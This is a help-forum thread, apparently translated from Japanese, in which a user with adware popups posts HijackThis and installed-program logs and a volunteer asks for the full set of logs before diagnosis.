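悪代官の伏魔殿 Bulletin Board
Popups and ads are being forcibly displayed and I need help.
As the subject says, I'm having trouble with popups and with being forcibly redirected to what look like advertising sites. What should I do?
I'll paste the log below, so could you check it and tell me how to deal with this?
Thank you in advance.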

C:\Program Files (x86)\Naver\LINE\Line.exe
C:\Program Files (x86)\Skype\Phone\Skype.exe
C:\Program Files (x86)\i-Funbox DevTeam\iFunBox.exe
C:\ProgramData\{021e6b93-a7a5-9558-021e-e6b93a7aae4e}\Battle Network Rockman Exe 3 Black (Japan) (V1.1).exe
C:\Program Files (x86)\DivX\DivX Update\DivXUpdate.exe
C:\Program Files (x86)\iTunes\iTunesHelper.exe
c:\program files (x86)\google\chrome\application\chrome.exe
C:\PROGRA~2\SEARCH~1\SearchProtect\bin\cltmng.exe
C:\PROGRA~2\SEARCH~1\UI\bin\cltmngui.exe
C:\Program Files (x86)\Common Files\Apple\Mobile Device Support\ATH.exe
C:\Program Files (x86)\Common Files\Apple\Mobile Device Support\ATH.exe
C:\Program Files (x86)\Common Files\Apple\Mobile Device Support\ATH.exe
C:\Program Files (x86)\Common Files\Apple\Mobile Device Support\SyncServer.exe
C:\Program Files (x86)\Common Files\Apple\Mobile Device Support\ATH.exe
C:\Program Files (x86)\Common Files\Apple\Mobile Device Support\ATH.exe
C:\Program Files (x86)\Common Files\Apple\Mobile Device Support\ATH.exe
C:\Program Files (x86)\Common Files\Apple\Mobile Device Support\ATH.exe
C:\Program Files (x86)\Apple Software Update\SoftwareUpdate.exe
C:\Users\ryota\Downloads\HijackThis (1).exe

F2 - REG:system.ini: UserInit=userinit.exe
O2 - BHO: ExstraSaviings - {78f73e11-e6b2-48a8-88b7-9c9db3ca8dc5} - C:\Program Files (x86)\ExstraSaviings\bW26gfXJvpMiqk.dll
O4 - HKLM\..\Run: [HDAudDeck] C:\Program Files (x86)\VIA\VIAudioi\VDeck\VDeck.exe -r
O4 - HKLM\..\Run: [APSDaemon] "C:\Program Files (x86)\Common Files\Apple\Apple Application Support\APSDaemon.exe"
O4 - HKLM\..\Run: [Google Japanese Input Prelauncher] "C:\Program Files (x86)\Google\Google Japanese Input\GoogleIMEJaBroker32.exe" --mode=prelaunch_processes
O4 - HKLM\..\Run: [Adobe ARM] "C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\AdobeARM.exe"
O4 - HKLM\..\Run: [DivXUpdate] "C:\Program Files (x86)\DivX\DivX Update\DivXUpdate.exe" /CHECKNOW
O4 - HKLM\..\Run: [au_WiFi_Connect] "C:\Program Files (x86)\au Wi-Fi接続ツール\au_WiFi_Connect.exe" -x
O4 - HKLM\..\Run: [QuickTime Task] "C:\Program Files (x86)\QuickTime\QTTask.exe" -atboottime
O4 - HKLM\..\Run: [iTunesHelper] "C:\Program Files (x86)\iTunes\iTunesHelper.exe"
O4 - HKLM\..\Run: [CnsMin] Rundll32.exe C:\Windows\DOWNLO~1\CnsMin.dll,Rundll32
O4 - HKLM\..\Run: [WinCheck] C:\Users\ryota\AppData\Local\03000200-1425075226-0500-0006-000700080009\bnsq55B.exe
O4 - HKCU\..\Run: [ApplicationManager] C:\Users\ryota\AppData\Roaming\ApplicationManager\bin\ApplicationManager.exe
O4 - HKCU\..\Run: [Line] "C:\Program Files (x86)\Naver\LINE\Line.exe" --booting
O4 - HKCU\..\Run: [Skype] "C:\Program Files (x86)\Skype\Phone\Skype.exe" /minimized /regrun
O4 - HKCU\..\Run: [DAEMON Tools Lite] "C:\Program Files (x86)\DAEMON Tools Lite\DTLite.exe" -autorun
O4 - HKCU\..\Run: [iFunBox Fast App Install Handler] C:\Program Files (x86)\i-Funbox DevTeam\iFunBox.exe /tray
O4 - HKCU\..\Run: [OneDrive] "C:\Users\ryota\AppData\Local\Microsoft\OneDrive\OneDrive.exe" /background
O4 - Startup: Battle Network Rockman Exe 3 Black (Japan) (V1.1).lnk = C:\ProgramData\{021e6b93-a7a5-9558-021e-e6b93a7aae4e}\Battle Network Rockman Exe 3 Black (Japan) (V1.1).exe
O4 - Global Startup: McAfee Security Scan Plus.lnk = C:\Program Files\McAfee Security Scan\3.8.150\SSScheduler.exe
O9 - Extra button: JWord(日本語キーワード) - {5D73EE86-05F1-49ed-B850-E423120EC338} - http://www.jword.jp/intro/?partner=AP&type=lk&frm=iebutton (file missing)
O9 - Extra button: Skype Click to Call settings - {898EA8C8-E7FF-479B-8935-AEC46303B9E5} - C:\Program Files (x86)\Skype\Toolbars\Internet Explorer\SkypeIEPlugin.dll
O11 - Options group: [!CNS] JWord(日本語キーワード)
O11 - Options group: [ACCELERATED_GRAPHICS] Accelerated graphics
O15 - ESC Trusted Zone: http://*.update.microsoft.com
O16 - DPF: {1DC420F0-D89A-40D0-B5CC-92B9AD19A1AC} (HGPluginJP28 Class) - http://down.hangame.co.jp/jp/dist/hgstart/HGPluginJP28.cab
O16 - DPF: {255A2E53-D2E3-42DA-9C1D-36B289B8E18B} (DMMLauncherAx Control) - http://dl.app-netgame.dmm.com/launcher/DMMLauncherAx_32.cab
O16 - DPF: {5082D9B5-5538-4C50-BDB1-C5F44BFB98CC} (HgRunPub Class) - http://down.hangame.co.jp/jp/installer/HgRunPub.cab
O16 - DPF: {AA07EBD2-EBDD-4BD6-9F8F-114BD513492C} (NeffyLauncherCtl Class) - http://dist.cdnetworks.co.jp/cdndist/neffy/NeffyLauncher.cab
O16 - DPF: {D4B68B83-8710-488B-A692-D74B50BA558E} (Creative Software AutoUpdate Support Package 2) - http://ccfiles.creative.com/Web/softwareupdate/ocx/15113/CTPIDPDE.cab
O16 - DPF: {E705A591-DA3C-4228-B0D5-A356DBA42FBF} (Creative Software AutoUpdate 2) - http://ccfiles.creative.com/Web/softwareupdate/su2/ocx/20015/CTSUEng.cab
O16 - DPF: {F6ACF75C-C32C-447B-9BEF-46B766368D29} (Creative Software AutoUpdate Support Package) - http://ccfiles.creative.com/Web/softwareupdate/ocx/121022/CTPID.cab
O16 - DPF: {F8160836-0C11-4CA4-AD87-944542C7BCBD} (PubPlugin Class) - http://down.hangame.co.jp/jp/purple/launcher/PubPlugin.cab
O17 - HKLM\System\CCS\Services\Tcpip\..\{0693221B-E6F5-43F7-953D-6A2229EB2054}: NameServer = 60.56.0.135 218.251.89.134
O17 - HKLM\System\CS1\Services\Tcpip\..\{0693221B-E6F5-43F7-953D-6A2229EB2054}: NameServer = 60.56.0.135 218.251.89.134
O18 - Protocol: skype4com - {FFC8B962-9B40-4DFF-9458-1830C7DD7F5D} - C:\PROGRA~2\COMMON~1\Skype\SKYPE4~1.DLL
O18 - Protocol: skypec2c - {91774881-D725-4E58-B298-07617B9B86A8} - C:\Program Files (x86)\Skype\Toolbars\Internet Explorer\SkypeIEPlugin.dll
O20 - AppInit_DLLs: C:\PROGRA~2\SearchProtect\SearchProtect\bin\VC32Loader.dll
O23 - Service: Adobe Acrobat Update Service (AdobeARMservice) - Adobe Systems Incorporated - C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe
O23 - Service: Adobe Flash Player Update Service (AdobeFlashPlayerUpdateSvc) - Adobe Systems Incorporated - C:\Windows\SysWOW64\Macromed\Flash\FlashPlayerUpdateService.exe
O23 - Service: @%SystemRoot%\system32\Alg.exe,-112 (ALG) - Unknown owner - C:\WINDOWS\System32\alg.exe (file missing)
O23 - Service: Apple Mobile Device - Apple Inc. - C:\Program Files (x86)\Common Files\Apple\Mobile Device Support\AppleMobileDeviceService.exe
O23 - Service: auWifiConnectSvc - Unknown owner - C:\Program Files (x86)\au Wi-Fi接続ツール\auWifiConnectSvc.exe (file missing)
O23 - Service: Search Protect Service (CltMngSvc) - Client Connect LTD - C:\Program Files (x86)\SearchProtect\Main\bin\CltMngSvc.exe
O23 - Service: Intel(R) Content Protection HECI Service (cphs) - Intel Corporation - C:\WINDOWS\SysWow64\IntelCpHeciSvc.exe
O23 - Service: @%SystemRoot%\system32\efssvc.dll,-100 (EFS) - Unknown owner - C:\WINDOWS\System32\lsass.exe (file missing)
O23 - Service: @%systemroot%\system32\fxsresm.dll,-118 (Fax) - Unknown owner - C:\WINDOWS\system32\fxssvc.exe (file missing)
O23 - Service: Freemake Improver - Freemake - C:\ProgramData\Freemake\FreemakeUtilsService\FreemakeUtilsService.exe
O23 - Service: Google Japanese Input Cache Service (GoogleIMEJaCacheService) - Google Inc. - C:\Program Files (x86)\Google\Google Japanese Input\GoogleIMEJaCacheService.exe
O23 - Service: Google Update サービス (gupdate) (gupdate) - Google Inc. - C:\Program Files (x86)\Google\Update\GoogleUpdate.exe
O23 - Service: Google Update サービス (gupdatem) (gupdatem) - Google Inc. - C:\Program Files (x86)\Google\Update\GoogleUpdate.exe
O23 - Service: @%SystemRoot%\system32\ieetwcollectorres.dll,-1000 (IEEtwCollectorService) - Unknown owner - C:\WINDOWS\system32\IEEtwCollector.exe (file missing)
O23 - Service: Intel(R) HD Graphics Control Panel Service (igfxCUIService1.0.0.0) - Unknown owner - C:\WINDOWS\system32\igfxCUIService.exe (file missing)
O23 - Service: Intel(R) Capability Licensing Service Interface - Intel(R) Corporation - C:\Program Files\Intel\iCLS Client\HeciServer.exe
O23 - Service: iPod サービス (iPod Service) - Apple Inc. - C:\Program Files\iPod\bin\iPodService.exe
O23 - Service: Intel(R) Dynamic Application Loader Host Interface Service (jhi_service) - Intel Corporation - C:\Program Files (x86)\Intel\Intel(R) Management Engine Components\DAL\jhi_service.exe
O23 - Service: @keyiso.dll,-100 (KeyIso) - Unknown owner - C:\WINDOWS\system32\lsass.exe (file missing)
O23 - Service: Intel(R) Management and Security Application Local Management Service (LMS) - Intel Corporation - C:\Program Files (x86)\Intel\Intel(R) Management Engine Components\LMS\LMS.exe
O23 - Service: McAfee Security Scan Component Host Service (McComponentHostService) - McAfee, Inc. - C:\Program Files\McAfee Security Scan\3.8.150\McCHSvc.exe
O23 - Service: Mozilla Maintenance Service (MozillaMaintenance) - Mozilla Foundation - C:\Program Files (x86)\Mozilla Maintenance Service\maintenanceservice.exe
O23 - Service: @comres.dll,-2797 (MSDTC) - Unknown owner - C:\WINDOWS\System32\msdtc.exe (file missing)
O23 - Service: @%SystemRoot%\System32\netlogon.dll,-102 (Netlogon) - Unknown owner - C:\WINDOWS\system32\lsass.exe (file missing)
O23 - Service: @%systemroot%\system32\Locator.exe,-2 (RpcLocator) - Unknown owner - C:\WINDOWS\system32\locator.exe (file missing)
O23 - Service: @%SystemRoot%\system32\samsrv.dll,-1 (SamSs) - Unknown owner - C:\WINDOWS\system32\lsass.exe (file missing)
O23 - Service: Skype Updater (SkypeUpdate) - Skype Technologies - C:\Program Files (x86)\Skype\Updater\Updater.exe
O23 - Service: @%SystemRoot%\system32\snmptrap.exe,-3 (SNMPTRAP) - Unknown owner - C:\WINDOWS\System32\snmptrap.exe (file missing)
O23 - Service: @%systemroot%\system32\spoolsv.exe,-1 (Spooler) - Unknown owner - C:\WINDOWS\System32\spoolsv.exe (file missing)
O23 - Service: @%SystemRoot%\system32\sppsvc.exe,-101 (sppsvc) - Unknown owner - C:\WINDOWS\system32\sppsvc.exe (file missing)
O23 - Service: Steam Client Service - Valve Corporation - C:\Program Files (x86)\Common Files\Steam\SteamService.exe
O23 - Service: Tango Core Service (TangoCoreService) - Unknown owner - C:\Program Files (x86)\Siemens\Common\TangoCoreService.exe
O23 - Service: @%SystemRoot%\system32\ui0detect.exe,-101 (UI0Detect) - Unknown owner - C:\WINDOWS\system32\UI0Detect.exe (file missing)
O23 - Service: Intel(R) Management and Security Application User Notification Service (UNS) - Intel Corporation - C:\Program Files (x86)\Intel\Intel(R) Management Engine Components\UNS\UNS.exe
O23 - Service: @%SystemRoot%\system32\vaultsvc.dll,-1003 (VaultSvc) - Unknown owner - C:\WINDOWS\system32\lsass.exe (file missing)
O23 - Service: @%SystemRoot%\system32\vds.exe,-100 (vds) - Unknown owner - C:\WINDOWS\System32\vds.exe (file missing)
O23 - Service: @oem4.inf,%ViaKaraokeSrv.SvcDesc%;VIA Karaoke digital mixer Service (VIAKaraokeService) - Unknown owner - C:\WINDOWS\system32\viakaraokesrv.exe (file missing)
O23 - Service: @%systemroot%\system32\vssvc.exe,-102 (VSS) - Unknown owner - C:\WINDOWS\system32\vssvc.exe (file missing)
O23 - Service: @%systemroot%\system32\wbengine.exe,-104 (wbengine) - Unknown owner - C:\WINDOWS\system32\wbengine.exe (file missing)
O23 - Service: @%ProgramFiles%\Windows Defender\MpAsDesc.dll,-320 (WdNisSvc) - Unknown owner - C:\Program Files (x86)\Windows Defender\NisSrv.exe (file missing)
O23 - Service: @%ProgramFiles%\Windows Defender\MpAsDesc.dll,-310 (WinDefend) - Unknown owner - C:\Program Files (x86)\Windows Defender\MsMpEng.exe (file missing)
O23 - Service: @%Systemroot%\system32\wbem\wmiapsrv.exe,-110 (wmiApSrv) - Unknown owner - C:\WINDOWS\system32\wbem\WmiApSrv.exe (file missing)
O23 - Service: @%PROGRAMFILES%\Windows Media Player\wmpnetwk.exe,-101 (WMPNetworkSvc) - Unknown owner - C:\Program Files (x86)\Windows Media Player\wmpnetwk.exe (file missing)
  • かなは
  • 2015/03/20 (Fri) 18:36:25
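The logs are insufficient
Good evening, my name is IVNO.
First of all, let me tell you just this up front.
You had better not touch illegally obtained software.
I strongly recommend deleting everything that was obtained that way.
If you keep it, there is a risk of reinfection.
Now then, to begin the investigation, we ask everyone to check the terms of use and collect logs.
First, please check the terms of use below to confirm that there are no violations.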

http://akumaden.web.fc2.com/

If there are no violations, there is no problem, so please collect the HJT and CC logs from the URL below,
and paste both of the collected logs when you reply.

http://akumaden.web.fc2.com/prepare.html
  • IVNO
  • MAIL
  • 2015/03/20 (Fri) 19:04:32
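Re: Popups and ads are being forcibly displayed and I need help.
Thank you for your reply.
First, I should tell you that I am not very familiar with PC environments.
As for the illegally obtained software, I was not much involved with it, so at present I don't know about it.
This is a PC shared by the family, so you may treat such software as subject to deletion as well. Thank you.
The logs are below.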

HJT

C:\Program Files (x86)\Naver\LINE\Line.exe
C:\Program Files (x86)\Skype\Phone\Skype.exe
C:\Program Files (x86)\i-Funbox DevTeam\iFunBox.exe
C:\ProgramData\{021e6b93-a7a5-9558-021e-e6b93a7aae4e}\Battle Network Rockman Exe 3 Black (Japan) (V1.1).exe
C:\Program Files (x86)\DivX\DivX Update\DivXUpdate.exe
C:\Program Files (x86)\iTunes\iTunesHelper.exe
c:\program files (x86)\google\chrome\application\chrome.exe
C:\PROGRA~2\SEARCH~1\SearchProtect\bin\cltmng.exe
C:\PROGRA~2\SEARCH~1\UI\bin\cltmngui.exe
C:\Program Files (x86)\Common Files\Apple\Mobile Device Support\ATH.exe
C:\Program Files (x86)\Common Files\Apple\Mobile Device Support\ATH.exe
C:\Program Files (x86)\Common Files\Apple\Mobile Device Support\ATH.exe
C:\Program Files (x86)\Common Files\Apple\Mobile Device Support\SyncServer.exe
C:\Program Files (x86)\Common Files\Apple\Mobile Device Support\ATH.exe
C:\Program Files (x86)\Common Files\Apple\Mobile Device Support\ATH.exe
C:\Program Files (x86)\Common Files\Apple\Mobile Device Support\ATH.exe
C:\Program Files (x86)\Common Files\Apple\Mobile Device Support\ATH.exe
C:\Program Files (x86)\Apple Software Update\SoftwareUpdate.exe
C:\Users\ryota\DOWNLOADS\HijackThis (1).exe

F2 - REG:system.ini: UserInit=userinit.exe
O2 - BHO: ExstraSaviings - {78f73e11-e6b2-48a8-88b7-9c9db3ca8dc5} - C:\Program Files (x86)\ExstraSaviings\bW26gfXJvpMiqk.dll
O4 - HKLM\..\Run: [HDAudDeck] C:\Program Files (x86)\VIA\VIAudioi\VDeck\VDeck.exe -r
O4 - HKLM\..\Run: [APSDaemon] "C:\Program Files (x86)\Common Files\Apple\Apple Application Support\APSDaemon.exe"
O4 - HKLM\..\Run: [Google Japanese Input Prelauncher] "C:\Program Files (x86)\Google\Google Japanese Input\GoogleIMEJaBroker32.exe" --mode=prelaunch_processes
O4 - HKLM\..\Run: [Adobe ARM] "C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\AdobeARM.exe"
O4 - HKLM\..\Run: [DivXUpdate] "C:\Program Files (x86)\DivX\DivX Update\DivXUpdate.exe" /CHECKNOW
O4 - HKLM\..\Run: [au_WiFi_Connect] "C:\Program Files (x86)\au Wi-Fi接続ツール\au_WiFi_Connect.exe" -x
O4 - HKLM\..\Run: [QuickTime Task] "C:\Program Files (x86)\QuickTime\QTTask.exe" -atboottime
O4 - HKLM\..\Run: [iTunesHelper] "C:\Program Files (x86)\iTunes\iTunesHelper.exe"
O4 - HKLM\..\Run: [CnsMin] Rundll32.exe C:\Windows\DOWNLO~1\CnsMin.dll,Rundll32
O4 - HKLM\..\Run: [WinCheck] C:\Users\ryota\AppData\Local\03000200-1425075226-0500-0006-000700080009\bnsq55B.exe
O4 - HKCU\..\Run: [ApplicationManager] C:\Users\ryota\AppData\Roaming\ApplicationManager\bin\ApplicationManager.exe
O4 - HKCU\..\Run: [Line] "C:\Program Files (x86)\Naver\LINE\Line.exe" --booting
O4 - HKCU\..\Run: [Skype] "C:\Program Files (x86)\Skype\Phone\Skype.exe" /minimized /regrun
O4 - HKCU\..\Run: [DAEMON Tools Lite] "C:\Program Files (x86)\DAEMON Tools Lite\DTLite.exe" -autorun
O4 - HKCU\..\Run: [iFunBox Fast App INSTALL Handler] C:\Program Files (x86)\i-Funbox DevTeam\iFunBox.exe /tray
O4 - HKCU\..\Run: [OneDrive] "C:\Users\ryota\AppData\Local\Microsoft\OneDrive\OneDrive.exe" /background
O4 - Startup: Battle Network Rockman Exe 3 Black (Japan) (V1.1).lnk = C:\ProgramData\{021e6b93-a7a5-9558-021e-e6b93a7aae4e}\Battle Network Rockman Exe 3 Black (Japan) (V1.1).exe
O4 - Global Startup: MCAFEE SECURITY SCAN Plus.lnk = C:\Program Files\MCAFEE SECURITY SCAN\3.8.150\SSScheduler.exe
O9 - Extra button: JWord(日本語キーワード) - {5D73EE86-05F1-49ed-B850-E423120EC338} - http://www.jword.jp/intro/?partner=AP&type=lk&frm=iebutton (file missing)
O9 - Extra button: Skype Click to Call settings - {898EA8C8-E7FF-479B-8935-AEC46303B9E5} - C:\Program Files (x86)\Skype\Toolbars\INTERNET EXPLORER\SkypeIEPlugin.dll
O11 - Options group: [!CNS] JWord(日本語キーワード)
O11 - Options group: [ACCELERATED_GRAPHICS] Accelerated graphics
O15 - ESC Trusted Zone: http://*.update.microsoft.com
O16 - DPF: {1DC420F0-D89A-40D0-B5CC-92B9AD19A1AC} (HGPluginJP28 Class) - http://down.hangame.co.jp/jp/dist/hgstart/HGPluginJP28.cab
O16 - DPF: {255A2E53-D2E3-42DA-9C1D-36B289B8E18B} (DMMLauncherAx Control) - http://dl.app-netgame.dmm.com/launcher/DMMLauncherAx_32.cab
O16 - DPF: {5082D9B5-5538-4C50-BDB1-C5F44BFB98CC} (HgRunPub Class) - http://down.hangame.co.jp/jp/installer/HgRunPub.cab
O16 - DPF: {AA07EBD2-EBDD-4BD6-9F8F-114BD513492C} (NeffyLauncherCtl Class) - http://dist.cdnetworks.co.jp/cdndist/neffy/NeffyLauncher.cab
O16 - DPF: {D4B68B83-8710-488B-A692-D74B50BA558E} (Creative Software AutoUpdate Support Package 2) - http://ccfiles.creative.com/Web/softwareupdate/ocx/15113/CTPIDPDE.cab
O16 - DPF: {E705A591-DA3C-4228-B0D5-A356DBA42FBF} (Creative Software AutoUpdate 2) - http://ccfiles.creative.com/Web/softwareupdate/su2/ocx/20015/CTSUEng.cab
O16 - DPF: {F6ACF75C-C32C-447B-9BEF-46B766368D29} (Creative Software AutoUpdate Support Package) - http://ccfiles.creative.com/Web/softwareupdate/ocx/121022/CTPID.cab
O16 - DPF: {F8160836-0C11-4CA4-AD87-944542C7BCBD} (PubPlugin Class) - http://down.hangame.co.jp/jp/purple/launcher/PubPlugin.cab
O17 - HKLM\System\CCS\Services\Tcpip\..\{0693221B-E6F5-43F7-953D-6A2229EB2054}: NameServer = 60.56.0.135 218.251.89.134
O17 - HKLM\System\CS1\Services\Tcpip\..\{0693221B-E6F5-43F7-953D-6A2229EB2054}: NameServer = 60.56.0.135 218.251.89.134
O18 - Protocol: skype4com - {FFC8B962-9B40-4DFF-9458-1830C7DD7F5D} - C:\PROGRA~2\COMMON~1\Skype\SKYPE4~1.DLL
O18 - Protocol: skypec2c - {91774881-D725-4E58-B298-07617B9B86A8} - C:\Program Files (x86)\Skype\Toolbars\INTERNET EXPLORER\SkypeIEPlugin.dll
O20 - AppInit_DLLs: C:\PROGRA~2\SearchProtect\SearchProtect\bin\VC32Loader.dll
O23 - Service: Adobe Acrobat Update Service (AdobeARMservice) - Adobe Systems Incorporated - C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe
O23 - Service: Adobe Flash Player Update Service (AdobeFlashPlayerUpdateSvc) - Adobe Systems Incorporated - C:\Windows\SysWOW64\Macromed\Flash\FlashPlayerUpdateService.exe
O23 - Service: @%SystemRoot%\system32\Alg.exe,-112 (ALG) - Unknown owner - C:\WINDOWS\System32\alg.exe (file missing)
O23 - Service: Apple Mobile Device - Apple Inc. - C:\Program Files (x86)\Common Files\Apple\Mobile Device Support\AppleMobileDeviceService.exe
O23 - Service: auWifiConnectSvc - Unknown owner - C:\Program Files (x86)\au Wi-Fi接続ツール\auWifiConnectSvc.exe (file missing)
O23 - Service: Search Protect Service (CltMngSvc) - Client Connect LTD - C:\Program Files (x86)\SearchProtect\Main\bin\CltMngSvc.exe
O23 - Service: Intel(R) Content Protection HECI Service (cphs) - Intel Corporation - C:\WINDOWS\SysWow64\IntelCpHeciSvc.exe
O23 - Service: @%SystemRoot%\system32\efssvc.dll,-100 (EFS) - Unknown owner - C:\WINDOWS\System32\lsass.exe (file missing)
O23 - Service: @%systemroot%\system32\fxsresm.dll,-118 (Fax) - Unknown owner - C:\WINDOWS\system32\fxssvc.exe (file missing)
O23 - Service: Freemake Improver - Freemake - C:\ProgramData\Freemake\FreemakeUtilsService\FreemakeUtilsService.exe
O23 - Service: Google Japanese Input Cache Service (GoogleIMEJaCacheService) - Google Inc. - C:\Program Files (x86)\Google\Google Japanese Input\GoogleIMEJaCacheService.exe
O23 - Service: Google Update サービス (gupdate) (gupdate) - Google Inc. - C:\Program Files (x86)\Google\Update\GoogleUpdate.exe
O23 - Service: Google Update サービス (gupdatem) (gupdatem) - Google Inc. - C:\Program Files (x86)\Google\Update\GoogleUpdate.exe
O23 - Service: @%SystemRoot%\system32\ieetwcollectorres.dll,-1000 (IEEtwCollectorService) - Unknown owner - C:\WINDOWS\system32\IEEtwCollector.exe (file missing)
O23 - Service: Intel(R) HD Graphics Control Panel Service (igfxCUIService1.0.0.0) - Unknown owner - C:\WINDOWS\system32\igfxCUIService.exe (file missing)
O23 - Service: Intel(R) Capability Licensing Service Interface - Intel(R) Corporation - C:\Program Files\Intel\iCLS Client\HeciServer.exe
O23 - Service: iPod サービス (iPod Service) - Apple Inc. - C:\Program Files\iPod\bin\iPodService.exe
O23 - Service: Intel(R) Dynamic Application Loader Host Interface Service (jhi_service) - Intel Corporation - C:\Program Files (x86)\Intel\Intel(R) Management Engine Components\DAL\jhi_service.exe
O23 - Service: @keyiso.dll,-100 (KeyIso) - Unknown owner - C:\WINDOWS\system32\lsass.exe (file missing)
O23 - Service: Intel(R) Management and Security Application Local Management Service (LMS) - Intel Corporation - C:\Program Files (x86)\Intel\Intel(R) Management Engine Components\LMS\LMS.exe
O23 - Service: McAfee Security Scan Component Host Service (McComponentHostService) - McAfee, Inc. - C:\Program Files\McAfee Security Scan\3.8.150\McCHSvc.exe
O23 - Service: Mozilla Maintenance Service (MozillaMaintenance) - Mozilla Foundation - C:\Program Files (x86)\Mozilla Maintenance Service\maintenanceservice.exe
O23 - Service: @comres.dll,-2797 (MSDTC) - Unknown owner - C:\WINDOWS\System32\msdtc.exe (file missing)
O23 - Service: @%SystemRoot%\System32\netlogon.dll,-102 (Netlogon) - Unknown owner - C:\WINDOWS\system32\lsass.exe (file missing)
O23 - Service: @%systemroot%\system32\Locator.exe,-2 (RpcLocator) - Unknown owner - C:\WINDOWS\system32\locator.exe (file missing)
O23 - Service: @%SystemRoot%\system32\samsrv.dll,-1 (SamSs) - Unknown owner - C:\WINDOWS\system32\lsass.exe (file missing)
O23 - Service: Skype Updater (SkypeUpdate) - Skype Technologies - C:\Program Files (x86)\Skype\Updater\Updater.exe
O23 - Service: @%SystemRoot%\system32\snmptrap.exe,-3 (SNMPTRAP) - Unknown owner - C:\WINDOWS\System32\snmptrap.exe (file missing)
O23 - Service: @%systemroot%\system32\spoolsv.exe,-1 (Spooler) - Unknown owner - C:\WINDOWS\System32\spoolsv.exe (file missing)
O23 - Service: @%SystemRoot%\system32\sppsvc.exe,-101 (sppsvc) - Unknown owner - C:\WINDOWS\system32\sppsvc.exe (file missing)
O23 - Service: Steam Client Service - Valve Corporation - C:\Program Files (x86)\Common Files\Steam\SteamService.exe
O23 - Service: Tango Core Service (TangoCoreService) - Unknown owner - C:\Program Files (x86)\Siemens\Common\TangoCoreService.exe
O23 - Service: @%SystemRoot%\system32\ui0detect.exe,-101 (UI0Detect) - Unknown owner - C:\WINDOWS\system32\UI0Detect.exe (file missing)
O23 - Service: Intel(R) Management and Security Application User Notification Service (UNS) - Intel Corporation - C:\Program Files (x86)\Intel\Intel(R) Management Engine Components\UNS\UNS.exe
O23 - Service: @%SystemRoot%\system32\vaultsvc.dll,-1003 (VaultSvc) - Unknown owner - C:\WINDOWS\system32\lsass.exe (file missing)
O23 - Service: @%SystemRoot%\system32\vds.exe,-100 (vds) - Unknown owner - C:\WINDOWS\System32\vds.exe (file missing)
O23 - Service: @oem4.inf,%ViaKaraokeSrv.SvcDesc%;VIA Karaoke digital mixer Service (VIAKaraokeService) - Unknown owner - C:\WINDOWS\system32\viakaraokesrv.exe (file missing)
O23 - Service: @%systemroot%\system32\vssvc.exe,-102 (VSS) - Unknown owner - C:\WINDOWS\system32\vssvc.exe (file missing)
O23 - Service: @%systemroot%\system32\wbengine.exe,-104 (wbengine) - Unknown owner - C:\WINDOWS\system32\wbengine.exe (file missing)
O23 - Service: @%ProgramFiles%\Windows Defender\MpAsDesc.dll,-320 (WdNisSvc) - Unknown owner - C:\Program Files (x86)\Windows Defender\NisSrv.exe (file missing)
O23 - Service: @%ProgramFiles%\Windows Defender\MpAsDesc.dll,-310 (WinDefend) - Unknown owner - C:\Program Files (x86)\Windows Defender\MsMpEng.exe (file missing)
O23 - Service: @%Systemroot%\system32\wbem\wmiapsrv.exe,-110 (wmiApSrv) - Unknown owner - C:\WINDOWS\system32\wbem\WmiApSrv.exe (file missing)
O23 - Service: @%PROGRAMFILES%\Windows Media Player\wmpnetwk.exe,-101 (WMPNetworkSvc) - Unknown owner - C:\Program Files (x86)\Windows Media Player\wmpnetwk.exe (file missing)

CC
AAlllSaveer "" 2015/03/04
Adobe AIR Adobe Systems Incorporated 2014/11/13 3.6.0.6090
Adobe Flash Media Live Encoder 3.2 Adobe Systems Incorporated 2012/10/31 15.8 MB 3.2.0
Adobe Flash Player 16 NPAPI Adobe Systems Incorporated 2015/02/05 6.00 MB 16.0.0.305
Adobe Reader XI (11.0.10) - Japanese Adobe Systems Incorporated 2015/02/08 206 MB 11.0.10
AdPunisher AdPunisher 2014/02/22
Age of Empires II: HD Edition Hidden Path Entertainment, Ensemble Studios 2014/11/13
AmaRecTV Live 2014/11/13
AmvVideoCodec 2014/11/13
Apple Application Support Apple Inc. 2014/10/03 93.4 MB 3.0.6
Apple Mobile Device Support Apple Inc. 2014/10/03 21.6 MB 8.0.0.23
Apple Software Update Apple Inc. 2012/10/31 2.38 MB 2.1.3.127
ApplicationManager 2011.4.27.209 kingsoft 2014/11/13 2011.4.27.209
ArcheAge XLGAMES 2014/08/10
ArcheAge GameOn 2014/11/13 1
au Wi-Fi接続ツール 株式会社 ネットビジョン 2014/11/13
CCleaner Piriform 2015/03/20 5.03
Common GameOn 2014/11/13 46603608
Craving Explorer Version 1.6.4 T-Craft 2014/08/06 26.6 MB 1.6.4.0
Creative システム インフォメーション Creative Technology Limited 2014/11/13 1.10
CutterFunc CutterFunc 2014/02/25
DAEMON Tools Lite Disc Soft Ltd 2014/11/13 4.49.1.0356
DC-Bass Source 1.3.0 2014/11/13
DirectVobSub 2.40.4209 MPC-HC Team 2014/02/15 2.10 MB 2.40.4209
DiscounnTExeteensii "" 2015/03/04
DivXセットアップ DivX, LLC 2014/11/13 2.6.1.90
eo接続ツール Siemens 2012/10/31 2.0
Explzh for Windows (64bit) pon software 2014/11/13 7.1.7.0
ExstraSaviings "" 2015/03/06
ffdshow v1.1.4399 [2012-03-22] 2014/02/15 13.5 MB 1.1.4399.0
FlvPlayer 2014/11/13 ${VERSION}
Freemake Audio Converter バージョン 1.1.0 Ellora Assets Corporation 2014/06/29 49.4 MB 1.1.0
Gamepot Web実行環境 Gamepot 2012/12/04 308 KB 1.1.0
Google Chrome Google Inc. 2014/05/10 34.0.1847.131
Google 日本語入力 Google Inc. 2014/01/07 83.0 MB 1.13.1641.0
Hangame 2014/11/13
HiJackThis Trend Micro 2013/08/24 369 KB 1.0.0
Hounds DMM 2014/05/10 1.0.0
iFunbox (v2.94.2520.758), iFunbox DevTeam 2015/02/27 23.3 MB v2.94.2520.758
Intel(R) Management Engine Components Intel Corporation 2012/09/20 8.1.0.1281
Intel(R) Processor Graphics Intel Corporation 2012/09/20 9.17.10.2849
Intel(R) SDK for OpenCL - CPU Only Runtime Package Intel Corporation 2014/11/13 2.0.0.37149
Isaverr "" 2015/03/04
iTunes Apple Inc. 2014/10/03 219 MB 11.4.0.18
JWord(日本語キーワード) 2014/11/13
KDrive kingsoft 2014/11/13 1.21.0.1584
